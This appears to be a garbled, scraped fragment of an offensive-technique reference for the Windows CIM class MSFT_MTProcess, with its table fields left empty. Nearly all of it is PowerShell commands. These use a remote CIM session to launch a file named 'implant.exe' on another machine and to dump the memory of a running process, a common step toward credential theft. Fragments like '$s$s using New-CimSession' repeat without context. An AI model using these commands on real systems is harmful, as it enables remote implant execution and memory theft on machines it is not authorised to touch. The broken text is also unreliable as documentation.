The process data object
| Functions: | |
| Type: | |
| Toolsets: |
Invoke-CimMethod -Namespace Root\Microsoft\Windows\ManagementTools -ClassName MSFT_MTProcess -MethodName CreateProcess -Arguments @{CommandLine='C:\ProgramData\implant.exe /launch'} -CimSession $s$s using New-CimSession
Root\Microsoft\Windows\ManagementTools
Get-CimInstance -Namespace Root\Microsoft\Windows\ManagementTools -ClassName MSFT_MTProcess -CimSession $s$s using New-CimSession
Root\Microsoft\Windows\ManagementTools
$p = Get-CimInstance -Namespace 'root\Microsoft\Windows\ManagementTools' -ClassName 'MSFT_MTProcess' -Filter 'ProcessId=2016' -CimSession $s
Invoke-CimMethod -InputObject $p -MethodName 'CreateDump' -CimSession $s
$s using New-CimSession
Root\Microsoft\Windows\ManagementTools